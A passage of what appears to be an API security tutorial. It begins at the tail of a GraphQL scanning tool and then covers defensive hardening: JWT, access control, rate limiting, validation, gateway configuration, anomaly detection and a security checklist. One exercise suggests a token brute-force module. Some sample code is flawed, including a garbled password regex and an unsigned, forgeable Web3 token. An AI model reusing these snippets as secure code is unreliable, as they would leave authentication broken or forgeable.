            
        if vuln_types:
            print("\nVulnerabilities by Type:")
            for vuln_type, count in vuln_types.items():
                print(f"  - {vuln_type.replace('_', ' ').title()}: {count}")
                
        if vuln_severities:
            print("\nVulnerabilities by Severity:")
            for severity in ["critical", "high", "medium", "low"]:
                if severity in vuln_severities:
                    print(f"  - {severity.capitalize()}: {vuln_severities[severity]}")
                    
        print(f"\nResults saved to: {self.output_dir}")
        print("="*60 + "\n")

# Example usage
def main():
    parser = argparse.ArgumentParser(description="GraphQL API Security Testing Tool")
    parser.add_argument("endpoint", help="GraphQL API endpoint URL")
    parser.add_argument("-H", "--header", action="append", help="HTTP headers in format 'Name: Value'")
    parser.add_argument("-o", "--output", help="Output directory for results")
    parser.add_argument("-t", "--threads", type=int, default=5, help="Number of concurrent threads")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
    
    args = parser.parse_args()
    
    # Parse headers
    headers = {}
    if args.header:
        for header in args.header:
            if ":" in header:
                name, value = header.split(":", 1)
                headers[name.strip()] = value.strip()
            else:
                print(f"Warning: Invalid header format: {header}")
    
    # Create and run the GraphQL security scanner
    scanner = GraphQLSecurity(
        endpoint=args.endpoint,
        headers=headers,
        output_dir=args.output,
        threads=args.threads,
        verbose=args.verbose
    )
    
    scanner.run_all_tests()
    
if __name__ == "__main__":
    main()

Hands-On Challenge #4: Custom Tool Development

Try This: Extend one of the custom frameworks above to add a feature such as:

  1. Rate limiting detection module
  2. Authentication token brute force module
  3. API documentation generator based on discovered endpoints
  4. Report generation with severity ratings and remediation advice

Defense Perspective: API Security Hardening

As security professionals, we should not only identify vulnerabilities but also recommend effective defenses. Here are key strategies for hardening API security.

Authentication Best Practices

  1. Use Strong Authentication Standards:
    • Implement OAuth 2.0 with appropriate flows (e.g., Authorization Code with PKCE for SPAs)
    • Use OpenID Connect for authentication
    • Implement JWT best practices (proper signing, expiration, audience validation)
  2. Secure Token Implementation:
// TypeScript example of secure JWT implementation
import jwt from 'jsonwebtoken';
import crypto from 'crypto';

class TokenManager {
  private readonly secret: Buffer;
  private readonly algorithm = 'HS256';
  private readonly issuer = 'api.yourdomain.com';
  private readonly audience = 'your-client-id';
  
  constructor() {
    // Use a strong, environment-specific secret
    const secretKey = process.env.JWT_SECRET;
    if (!secretKey || secretKey.length < 32) {
      throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');
    }
    this.secret = Buffer.from(secretKey, 'base64');
  }
  
  generateToken(userId: string, role: string): string {
    const now = Math.floor(Date.now() / 1000);
    
    return jwt.sign(
      {
        sub: userId,
        role: role,
        jti: crypto.randomBytes(16).toString('hex'), // Unique token ID
        iat: now,
        exp: now + 3600, // 1 hour expiration
        iss: this.issuer,
        aud: this.audience
      },
      this.secret,
      { algorithm: this.algorithm }
    );
  }
  
  validateToken(token: string): any {
    try {
      return jwt.verify(token, this.secret, {
        algorithms: [this.algorithm],
        issuer: this.issuer,
        audience: this.audience
      });
    } catch (error) {
      throw new Error(`Token validation failed: ${error.message}`);
    }
  }
  
  refreshToken(token: string): string {
    const payload = this.validateToken(token);
    
    // Prevent refresh if token is about to expire
    const now = Math.floor(Date.now() / 1000);
    if (payload.exp - now < 300) { // Less than 5 minutes remaining
      throw new Error('Token too close to expiration for refresh');
    }
    
    // Create new token with same data but new expiration
    return this.generateToken(payload.sub, payload.role);
  }
}

export default new TokenManager();

Authorization Implementation

  1. Role-Based Access Control (RBAC):
// Express middleware for RBAC
function requireRole(role) {
  return (req, res, next) => {
    const user = req.user; // Assumes previous middleware set this
    
    if (!user) {
      return res.status(401).json({ error: 'Authentication required' });
    }
    
    if (typeof role === 'string' && user.role !== role) {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }
    
    if (Array.isArray(role) && !role.includes(user.role)) {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }
    
    next();
  };
}

// Usage in routes
app.get('/api/users', requireRole('admin'), (req, res) => {
  // Only admins can access this endpoint
});

app.get('/api/reports', requireRole(['admin', 'manager']), (req, res) => {
  // Both admins and managers can access this endpoint
});
  1. Attribute-Based Access Control (ABAC):
// TypeScript ABAC implementation
interface Resource {
  id: string;
  ownerId: string;
  type: string;
  public: boolean;
  status: string;
}

interface User {
  id: string;
  role: string;
  department: string;
  region: string;
}

class AccessControl {
  canAccess(user: User, action: string, resource: Resource): boolean {
    // Global admin can do anything
    if (user.role === 'admin') {
      return true;
    }
    
    // Owner can always access their own resources
    if (resource.ownerId === user.id) {
      return true;
    }
    
    // Public resources can be read by anyone
    if (action === 'read' && resource.public === true) {
      return true;
    }
    
    // Department-specific rules
    if (user.role === 'manager') {
      // Managers can read any resource in their department
      if (action === 'read' && resource.department === user.department) {
        return true;
      }
      
      // Managers can update resources in their department if they're in draft
      if (action === 'update' && 
          resource.department === user.department && 
          resource.status === 'draft') {
        return true;
      }
    }
    
    // Region-specific rules
    if (user.role === 'regional_admin' && resource.region === user.region) {
      return true;
    }
    
    // Default deny
    return false;
  }
}

// Usage
const accessControl = new AccessControl();
const user = getCurrentUser();
const resource = getRequestedResource();

if (accessControl.canAccess(user, 'update', resource)) {
  // Allow the operation
} else {
  // Deny with 403 Forbidden
}

Rate Limiting Implementation

// Rate limiting with Redis in Express
const redis = require('redis');
const { promisify } = require('util');

const redisClient = redis.createClient(process.env.REDIS_URL);
const incrAsync = promisify(redisClient.incr).bind(redisClient);
const expireAsync = promisify(redisClient.expire).bind(redisClient);

async function rateLimiter(req, res, next) {
  try {
    // Create a unique key based on IP or user ID
    const key = req.user ? `ratelimit:user:${req.user.id}` : `ratelimit:ip:${req.ip}`;
    
    // Increment the counter
    const count = await incrAsync(key);
    
    // Set expiration if this is the first request in the window
    if (count === 1) {
      await expireAsync(key, 60); // 60 second window
    }
    
    // Add rate limit headers
    res.setHeader('X-RateLimit-Limit', '100');
    res.setHeader('X-RateLimit-Remaining', Math.max(0, 100 - count));
    
    // Check if over limit
    if (count > 100) {
      return res.status(429).json({ 
        error: 'Rate limit exceeded',
        retryAfter: 60 // Seconds until reset
      });
    }
    
    next();
  } catch (error) {
    // If Redis fails, we'll still allow the request to proceed
    console.error('Rate limiting error:', error);
    next();
  }
}

// Use the middleware
app.use(rateLimiter);

Input Validation

  1. Schema Validation:
// Using Joi for schema validation
const Joi = require('joi');

// Define schema for user creation
const createUserSchema = Joi.object({
  username: Joi.string().alphanum().min(3).max(30).required(),
  email: Joi.string().email().required(),
  password: Joi.string().pattern(new RegExp('^[a-zA-Z0-9]{8,30}                )).required(),
  role: Joi.string().valid('user', 'admin').default('user'),
  age: Joi.number().integer().min(18).max(120),
  settings: Joi.object({
    newsletter: Joi.boolean().default(false),
    theme: Joi.string().valid('light', 'dark').default('light')
  }).default({})
});

// Middleware for validation
function validateRequest(schema) {
  return (req, res, next) => {
    const { error, value } = schema.validate(req.body, {
      abortEarly: false,  // Return all errors, not just the first
      stripUnknown: true  // Remove unknown properties
    });
    
    if (error) {
      const errorMessages = error.details.map(detail => detail.message);
      return res.status(400).json({ 
        error: 'Validation Error', 
        details: errorMessages 
      });
    }
    
    // Replace req.body with validated value
    req.body = value;
    next();
  };
}

// Use in route
app.post('/api/users', validateRequest(createUserSchema), (req, res) => {
  // Handler code - req.body now contains validated data
});
  1. GraphQL Input Validation:
// Using graphql-shield for permission/validation rules
const { shield, rule, and, or } = require('graphql-shield');
const { makeExecutableSchema } = require('@graphql-tools/schema');
const { applyMiddleware } = require('graphql-middleware');

// Define validation rules
const isValidEmail = rule()(async (parent, args, ctx, info) => {
  return /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}$/i.test(args.email) || 
    'Invalid email format';
});

const isStrongPassword = rule()(async (parent, args, ctx, info) => {
  // Min 8 chars, at least one uppercase, one lowercase, one number
  return /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[a-zA-Z\d]{8,}$/.test(args.password) || 
    'Password must be at least 8 characters with uppercase, lowercase, and number';
});

// Define GraphQL permissions/validations
const permissions = shield({
  Query: {
    user: isAuthenticated,
    users: isAdmin,
  },
  Mutation: {
    createUser: and(isAuthenticated, isValidEmail, isStrongPassword),
    updateUser: and(isAuthenticated, isValidEmail),
    deleteUser: and(isAuthenticated, isAdmin),
  },
});

// Create executable schema with permissions middleware
const schema = makeExecutableSchema({ typeDefs, resolvers });
const schemaWithMiddleware = applyMiddleware(schema, permissions);

GraphQL Specific Security

// Apollo Server configuration with security measures
const { ApolloServer } = require('apollo-server-express');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  context: ({ req }) => {
    // Authentication context
    const token = req.headers.authorization || '';
    const user = getUser(token); // Your auth function
    return { user };
  },
  validationRules: [
    // Query complexity analysis
    require('graphql-validation-complexity').createComplexityLimitRule(1000),
    
    // Query depth limit
    require('graphql-depth-limit')(10),
  ],
  plugins: [
    // Logging plugin for security monitoring
    {
      requestDidStart(requestContext) {
        return {
          didEncounterErrors(errorContext) {
            console.error('GraphQL errors:', errorContext.errors);
          },
          willSendResponse(responseContext) {
            const { operationName, query, variables } = responseContext.request;
            console.log(`Operation: ${operationName}`, {
              query,
              variables,
              user: responseContext.context.user?.id || 'anonymous',
            });
          },
        };
      },
    },
  ],
  // Disable introspection in production
  introspection: process.env.NODE_ENV !== 'production',
  // Disable GraphQL Playground in production
  playground: process.env.NODE_ENV !== 'production',
});

Secure API Documentation

// Express configuration with secure Swagger docs
const express = require('express');
const swaggerUi = require('swagger-ui-express');
const YAML = require('yamljs');
const swaggerDocument = YAML.load('./swagger.yaml');

const app = express();

// Only expose Swagger docs in non-production
if (process.env.NODE_ENV !== 'production') {
  app.use('/api-docs', swaggerUi.serve, swaggerUi.setup(swaggerDocument));
} else {
  // In production, secure the docs with authentication
  app.use('/api-docs', (req, res, next) => {
    // Basic authentication check
    const auth = req.headers.authorization;
    if (!auth || !auth.startsWith('Basic ')) {
      res.set('WWW-Authenticate', 'Basic realm="API Documentation"');
      return res.status(401).send('Authentication required');
    }
    
    // Decode credentials
    const credentials = Buffer.from(auth.split(' ')[1], 'base64').toString('utf-8');
    const [username, password] = credentials.split(':');
    
    // Check against environment variables
    if (username === process.env.DOCS_USERNAME && 
        password === process.env.DOCS_PASSWORD) {
      return next();
    }
    
    res.status(401).send('Invalid credentials');
  }, swaggerUi.serve, swaggerUi.setup(swaggerDocument));
}

API Gateway Security Configuration

# AWS API Gateway CloudFormation Template Example
Resources:
  ApiGateway:
    Type: AWS::ApiGateway::RestApi
    Properties:
      Name: SecureAPI
      Description: Secure API with proper authentication and rate limiting
      EndpointConfiguration:
        Types:
          - REGIONAL
      
  ApiKey:
    Type: AWS::ApiGateway::ApiKey
    Properties:
      Name: SecureAPIKey
      Description: API Key for client authentication
      Enabled: true
  
  UsagePlan:
    Type: AWS::ApiGateway::UsagePlan
    Properties:
      UsagePlanName: StandardUsagePlan
      Description: Standard usage plan with rate limiting
      Quota:
        Limit: 10000
        Period: MONTH
      Throttle:
        RateLimit: 10
        BurstLimit: 20
      ApiStages:
        - ApiId: !Ref ApiGateway
          Stage: !Ref ApiStage
  
  UsagePlanKey:
    Type: AWS::ApiGateway::UsagePlanKey
    Properties:
      KeyId: !Ref ApiKey
      KeyType: API_KEY
      UsagePlanId: !Ref UsagePlan
  
  ApiGatewayAuthorizer:
    Type: AWS::ApiGateway::Authorizer
    Properties:
      Name: CognitoAuthorizer
      Type: COGNITO_USER_POOLS
      IdentitySource: method.request.header.Authorization
      RestApiId: !Ref ApiGateway
      ProviderARNs:
        - !GetAtt UserPool.Arn
  
  ApiMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      HttpMethod: POST
      ResourceId: !GetAtt ApiGateway.RootResourceId
      RestApiId: !Ref ApiGateway
      ApiKeyRequired: true
      AuthorizationType: COGNITO_USER_POOLS
      AuthorizerId: !Ref ApiGatewayAuthorizer
      MethodResponses:
        - StatusCode: 200
        - StatusCode: 400
        - StatusCode: 401
        - StatusCode: 403
        - StatusCode: 500

API Security Checklist

Use this comprehensive checklist to secure your APIs:

  1. Authentication
    • [ ] Use standard authentication (OAuth2, JWT, API keys)
    • [ ] Implement proper token validation
    • [ ] Set short expiration times for tokens
    • [ ] Rotate credentials and keys regularly
    • [ ] Secure credential storage (use KMS, Vault, etc.)
    • [ ] Implement MFA for sensitive operations
  2. Authorization
    • [ ] Implement principle of least privilege
    • [ ] Use Role-Based Access Control (RBAC)
    • [ ] Consider Attribute-Based Access Control (ABAC) for complex permissions
    • [ ] Validate resource ownership on all endpoints
    • [ ] Apply authorization at both API gateway and service levels
  3. Input Validation
    • [ ] Validate all input parameters (type, format, range)
    • [ ] Implement schema validation for request bodies
    • [ ] Sanitize inputs to prevent injection attacks
    • [ ] Use a whitelist approach for input validation
  4. Output Control
    • [ ] Implement response filtering based on user permissions
    • [ ] Remove sensitive data from responses
    • [ ] Use consistent error messages that don't leak information
    • [ ] Consider implementing field-level security
  5. Rate Limiting and Quotas
    • [ ] Implement rate limiting per user/API key
    • [ ] Set quotas for resource-intensive operations
    • [ ] Use exponential backoff for repeated failures
    • [ ] Monitor for and alert on abnormal request patterns
  6. Logging and Monitoring
    • [ ] Log all API access with appropriate detail
    • [ ] Include correlation IDs for request tracing
    • [ ] Monitor for unusual activity patterns
    • [ ] Implement alerts for security-related events
    • [ ] Ensure logs are tamper-proof and preserved for auditing
  7. Transport Security
    • [ ] Use TLS 1.2+ for all API traffic
    • [ ] Implement proper certificate validation
    • [ ] Use strong cipher suites
    • [ ] Consider mutual TLS for high-security environments
    • [ ] Implement HSTS headers
  8. API Design
    • [ ] Follow RESTful conventions or GraphQL best practices
    • [ ] Use resource-based URLs and appropriate HTTP methods
    • [ ] Implement proper HTTP status codes
    • [ ] Version your APIs
    • [ ] Use nouns for resources, not verbs
  9. Infrastructure Security
    • [ ] Keep all components updated with security patches
    • [ ] Use a Web Application Firewall (WAF)
    • [ ] Implement network segmentation
    • [ ] Consider containerization for isolation
    • [ ] Run regular vulnerability scans
  10. Documentation and Testing
    • [ ] Document security requirements and controls
    • [ ] Perform regular security testing
    • [ ] Conduct penetration testing
    • [ ] Include security in CI/CD pipeline
    • [ ] Maintain a responsible disclosure program

Common Pitfalls & Troubleshooting

API Testing Challenges

Challenge Description Solution
Authentication Complexity Modern APIs use complex auth flows like OAuth2 Use specialized tools like Postman's auth helpers or write custom auth scripts
Maintaining State Tests require maintaining session state Create proper setup/teardown flows to manage state between tests
Rate Limiting API defenses block excessive testing Implement delays between requests, distribute testing, obtain higher rate limits for testing
Dynamic Endpoints API endpoints change based on data or UUIDs Create discovery flows that find valid IDs before testing endpoints
API Gateway Complexity Multiple layers of protection in modern APIs Test each layer independently before testing the entire stack

Troubleshooting Common Issues

When API testing fails, follow this systematic approach:

1. Authentication Issues

# Check if your token is valid
curl -I "https://api.example.com/health" \
  -H "Authorization: Bearer YOUR_TOKEN"

# If you get a 401/403, refresh your token
curl -X POST "https://auth.example.com/token" \
  -d "grant_type=refresh_token&refresh_token=YOUR_REFRESH_TOKEN"

2. Input Validation Problems

// Common causes of validation errors:
// 1. Incorrect data types
const data = {
  userId: "123",  // Should be numeric: 123
  amount: "50.5", // Should be numeric: 50.5
  active: "true"  // Should be boolean: true
};

// 2. Missing required fields
const incompleteData = {
  // Missing required 'email' field
  name: "John Doe",
  role: "user"
};

// 3. Value outside acceptable range
const invalidRangeData = {
  age: -5,         // Should be positive
  percentage: 120  // Should be 0-100
};

// Fix: Properly validate local data before sending
const validateUserData = (data) => {
  const errors = [];
  
  if (!data.email) errors.push("Email is required");
  if (typeof data.age !== 'number' || data.age < 0) errors.push("Age must be a positive number");
  // Add more validations...
  
  return errors.length ? errors : null;
};

3. Rate Limiting Detection and Handling

def handle_rate_limits(response, retry_after_default=60):
    """Handle rate limit responses with appropriate backoff"""
    if response.status_code == 429:
        # Try to get retry time from headers
        retry_after = response.headers.get('Retry-After')
        wait_time = int(retry_after) if retry_after and retry_after.isdigit() else retry_after_default
        
        print(f"Rate limited. Waiting {wait_time} seconds before retry.")
        time.sleep(wait_time)
        return True
    
    # Also check for custom rate limit headers
    remaining = response.headers.get('X-RateLimit-Remaining')
    if remaining and int(remaining) < 5:
        print(f"Almost rate limited ({remaining} requests left). Adding delay.")
        time.sleep(2)  # Add small delay when close to limit
    
    return False

4. Diagnosing Request/Response Issues

// Create a debugging proxy for API calls
const axios = require('axios');

// Create a debugging wrapper around axios
const debugAxios = axios.create();

// Add request interceptor
debugAxios.interceptors.request.use(request => {
  console.log('──────────────── REQUEST ────────────────');
  console.log('URL:', request.url);
  console.log('Method:', request.method.toUpperCase());
  console.log('Headers:', JSON.stringify(request.headers, null, 2));
  
  if (request.data) {
    console.log('Body:', typeof request.data === 'object' ? 
      JSON.stringify(request.data, null, 2) : request.data);
  }
  
  return request;
}, error => {
  console.error('Request Error:', error);
  return Promise.reject(error);
});

// Add response interceptor
debugAxios.interceptors.response.use(response => {
  console.log('──────────────── RESPONSE ────────────────');
  console.log('Status:', response.status, response.statusText);
  console.log('Headers:', JSON.stringify(response.headers, null, 2));
  console.log('Body:', typeof response.data === 'object' ? 
    JSON.stringify(response.data, null, 2) : response.data);
  
  return response;
}, error => {
  if (error.response) {
    console.log('──────────────── ERROR RESPONSE ────────────────');
    console.log('Status:', error.response.status, error.response.statusText);
    console.log('Headers:', JSON.stringify(error.response.headers, null, 2));
    console.log('Body:', typeof error.response.data === 'object' ? 
      JSON.stringify(error.response.data, null, 2) : error.response.data);
  } else {
    console.error('Response Error:', error.message);
  }
  
  return Promise.reject(error);
});

// Use the debugging axios for API calls
debugAxios.get('https://api.example.com/users')
  .then(response => {
    // Process the response
  })
  .catch(error => {
    // Handle errors
  });

When Your Tools Fail: Manual API Testing

When automated tools fail, these manual techniques can help:

# Base curl commands for manual testing
# 1. Basic GET request
curl -v "https://api.example.com/endpoint"

# 2. POST with JSON
curl -v -X POST "https://api.example.com/users" \
  -H "Content-Type: application/json" \
  -d '{"name": "Test User", "email": "test@example.com"}'

# 3. Test with custom headers
curl -v "https://api.example.com/protected-resource" \
  -H "Authorization: Bearer test-token" \
  -H "X-Custom-Header: Value"

# 4. Test for CORS issues
curl -v -X OPTIONS "https://api.example.com/users" \
  -H "Origin: https://example.org" \
  -H "Access-Control-Request-Method: POST" \
  -H "Access-Control-Request-Headers: Content-Type, Authorization"

# 5. Test with client certificate
curl -v "https://api.example.com/secure-endpoint" \
  --cert ./client.crt \
  --key ./client.key

Future of API Security

  1. Zero Trust API Security Models
    • Every API request is fully authenticated and authorized
    • Continuous validation throughout the request lifecycle
    • Micro-segmentation and granular access controls
  2. ML-Based API Anomaly Detection
    • Learning normal API usage patterns
    • Detecting anomalous behavior automatically
    • Predicting and preventing zero-day attacks
  3. API Security in Serverless Architectures
    • Function-level security policies
    • Event-driven security models
    • Ephemeral execution environments
  4. Continuous API Security Testing
    • API security built into CI/CD pipelines
    • Automated vulnerability scanning before deployment
    • Runtime self-testing and adaptation

Advanced API Attack and Defense Techniques

# Example: Next-gen API security using ML for request analysis
import numpy as np
import pandas as pd
from sklearn.ensemble import IsolationForest
import joblib
import time

class APIAnomalyDetector:
    def __init__(self, model_path=None, training_data_path=None):
        self.model = None
        self.feature_columns = [
            'request_size', 'num_parameters', 'response_time', 
            'status_code', 'hour_of_day', 'is_authenticated',
            'parameter_entropy', 'repeated_parameters'
        ]
        
        if model_path:
            self.load_model(model_path)
        elif training_data_path:
            self.train_model(training_data_path)
            
    def extract_features(self, request, response):
        """Extract features from request and response"""
        features = {}
        
        # Request features
        features['request_size'] = len(request.get('body', ''))
        features['num_parameters'] = len(request.get('params', {}))
        features['is_authenticated'] = 1 if 'authorization' in request.get('headers', {}) else 0
        
        # Calculate parameter entropy (randomness)
        if request.get('params'):
            param_values = ''.join(str(v) for v in request['params'].values())
            features['parameter_entropy'] = self._calculate_entropy(param_values)
        else:
            features['parameter_entropy'] = 0
            
        # Check for repeated parameters (potential fuzzing)
        features['repeated_parameters'] = self._count_repeated_params(request.get('params', {}))
        
        # Response features
        features['response_time'] = response.get('time', 0)
        features['status_code'] = response.get('status_code', 0)
        
        # Time-based features
        features['hour_of_day'] = time.localtime().tm_hour
        
        return features
        
    def _calculate_entropy(self, string_data):
        """Calculate Shannon entropy of a string"""
        if not string_data:
            return 0
        
        # Calculate frequency of each character
        freq = {}
        for c in string_data:
            freq[c] = freq.get(c, 0) + 1
            
        # Calculate entropy
        entropy = 0
        for count in freq.values():
            probability = count / len(string_data)
            entropy -= probability * np.log2(probability)
            
        return entropy
        
    def _count_repeated_params(self, params):
        """Count parameters that appear to be repetitions or fuzzing"""
        if not params:
            return 0
            
        # Look for similar parameter names (e.g., id1, id2, id3...)
        param_prefixes = {}
        for name in params.keys():
            # Extract alphabetic prefix
            prefix = ''.join(c for c in name if c.isalpha())
            if prefix:
                param_prefixes[prefix] = param_prefixes.get(prefix, 0) + 1
                
        # Count parameters with same prefix
        repeated = sum(count > 1 for count in param_prefixes.values())
        
        return repeated
        
    def train_model(self, training_data_path):
        """Train anomaly detection model"""
        # Load training data
        df = pd.read_csv(training_data_path)
        
        # Make sure we have the right columns
        for col in self.feature_columns:
            if col not in df.columns:
                raise ValueError(f"Training data missing required column: {col}")
                
        # Prepare features
        X = df[self.feature_columns].values
        
        # Train isolation forest model
        self.model = IsolationForest(
            n_estimators=100,
            max_samples='auto',
            contamination=0.01,  # Assume 1% of training data is anomalous
            random_state=42
        )
        
        self.model.fit(X)
        
    def save_model(self, model_path):
        """Save trained model"""
        if self.model:
            joblib.dump(self.model, model_path)
            
    def load_model(self, model_path):
        """Load trained model"""
        self.model = joblib.load(model_path)
        
    def predict(self, request, response):
        """Predict if a request/response is anomalous"""
        if not self.model:
            raise ValueError("Model not trained or loaded")
            
        # Extract features
        features = self.extract_features(request, response)
        
        # Convert to array in the right order
        X = np.array([[features[col] for col in self.feature_columns]])
        
        # Predict (-1 for anomaly, 1 for normal)
        prediction = self.model.predict(X)[0]
        
        # Get anomaly score
        score = self.model.decision_function(X)[0]
        
        return {
            'is_anomaly': prediction == -1,
            'anomaly_score': score,
            'features': features
        }

Decentralized API Security

// Example: Decentralized API authentication using Web3
const ethers = require('ethers');
const crypto = require('crypto');

class Web3APIAuth {
  constructor(providerUrl) {
    this.provider = new ethers.providers.JsonRpcProvider(providerUrl);
  }
  
  /**
   * Generate a challenge for the client to sign
   */
  generateChallenge(address) {
    const timestamp = Date.now();
    const randomBytes = crypto.randomBytes(16).toString('hex');
    const message = `Authenticate with API: ${randomBytes} at ${timestamp}`;
    
    // Store challenge for verification (in a database in production)
    this.pendingChallenges = this.pendingChallenges || {};
    this.pendingChallenges[address] = {
      message,
      timestamp,
      expires: timestamp + 5 * 60 * 1000 // 5 minutes
    };
    
    return {
      address,
      message,
      timestamp
    };
  }
  
  /**
   * Verify a signed challenge
   */
  async verifySignature(address, signature) {
    // Check if we have a pending challenge
    if (!this.pendingChallenges || !this.pendingChallenges[address]) {
      throw new Error('No pending challenge found for this address');
    }
    
    const challenge = this.pendingChallenges[address];
    
    // Check if challenge has expired
    if (Date.now() > challenge.expires) {
      delete this.pendingChallenges[address];
      throw new Error('Challenge has expired');
    }
    
    try {
      // Recover the address from the signature
      const recoveredAddress = ethers.utils.verifyMessage(
        challenge.message,
        signature
      );
      
      // Check if recovered address matches the claimed address
      if (recoveredAddress.toLowerCase() !== address.toLowerCase()) {
        throw new Error('Signature verification failed');
      }
      
      // Cleanup
      delete this.pendingChallenges[address];
      
      // Get ENS name if available
      let ensName = null;
      try {
        ensName = await this.provider.lookupAddress(address);
      } catch (error) {
        console.log('ENS lookup failed:', error.message);
      }
      
      // Return authentication result
      return {
        authenticated: true,
        address,
        ensName,
        timestamp: Date.now()
      };
    } catch (error) {
      throw new Error(`Signature verification failed: ${error.message}`);
    }
  }
  
  /**
   * Generate a JWT or similar token after successful authentication
   */
  generateToken(authResult) {
    // In a real implementation, this would create a JWT or similar token
    // Simplified for example purposes
    const payload = {
      sub: authResult.address,
      name: authResult.ensName || authResult.address.substring(0, 10),
      iat: Math.floor(Date.now() / 1000),
      exp: Math.floor(Date.now() / 1000) + (60 * 60) // 1 hour
    };
    
    // Sign the payload (would use a proper JWT library in production)
    const token = Buffer.from(JSON.stringify(payload)).toString('base64');
    
    return {
      token,
      expires_in: 3600,
      token_type: 'Bearer'
    };
  }
}

// Example usage in Express
const express = require('express');
const app = express();
app.use(express.json());

const auth = new Web3APIAuth('https://mainnet.infura.io/v3/YOUR_INFURA_KEY');

// Challenge generation endpoint
app.post('/api/auth/challenge', (req, res) => {
  const { address } = req.body;
  
  if (!address || !ethers.utils.isAddress(address)) {
    return res.status(400).json({ error: 'Invalid Ethereum address' });
  }
  
  const challenge = auth.generateChallenge(address);
  res.json(challenge);
});

// Authentication endpoint
app.post('/api/auth/verify', async (req, res) => {
  const { address, signature } = req.body;
  
  if (!address || !signature) {
    return res.status(400).json({ error: 'Missing address or signature' });
  }
  
  try {
    const authResult = await auth.verifySignature(address, signature);
    const tokenResponse = auth.generateToken(authResult);
    res.json(tokenResponse);
  } catch (error) {
    res.status(401).json({ error: error.message });
  }
});

app.listen(3000, () => {
  console.log('Web3 API auth server running on port 3000');
});

Key Takeaways & Resources

API Security Core Principles

  1. Defense in Depth: Implement multiple layers of security controls
  2. Least Privilege: Provide minimum access necessary for functionality
  3. Zero Trust: Verify every request regardless of source
  4. Secure by Design: Build security into APIs from the beginning
  5. Continuous Validation: Constantly test and verify security controls

Essential API Security Tools

  • Postman: API testing and documentation
  • OWASP ZAP: Security testing for APIs
  • Burp Suite: Professional penetration testing
  • Insomnia: API client with security testing features
  • MitmProxy: Intercepting proxy for API analysis
  • APIKit: Custom API security testing framework
  • TnT-Fuzzer: API fuzzing tool
  • Astra: REST API security testing automation
  1. Standards and Guidelines:
    • OWASP API Security Top 10
    • NIST Special Publication 800-95 (Guide to Secure Web Services)
    • API Security Best Practices by APISecurity.io
  2. Books:
    • "API Security in Action" by Neil Madden
    • "Hacking APIs" by Corey Ball
    • "Designing Web APIs" by Brenda Jin, Saurabh Sahni, and Amir Shevat
  3. Online Courses:
    • API Security on Pluralsight
    • Web Services & API Security on Coursera
    • Advanced API Security on Udemy
  4. Practice Environments:
    • OWASP Juice Shop
    • DVWS (Damn Vulnerable Web Services)
    • VAmPI (Vulnerable API)

Key Takeaways

  1. Comprehensive Testing: Apply structured methodology across all APIs
  2. Automate Security: Build security tests into CI/CD pipeline
  3. Know Your Data: Understand data sensitivity and protect accordingly
  4. Monitor Everything: Establish robust logging and monitoring
  5. Stay Updated: API security threats evolve rapidly

Remember: API security is a continuous process, not a one-time task. Regular assessments, continuous monitoring, and staying current with emerging threats are essential for maintaining a strong security posture.

Read more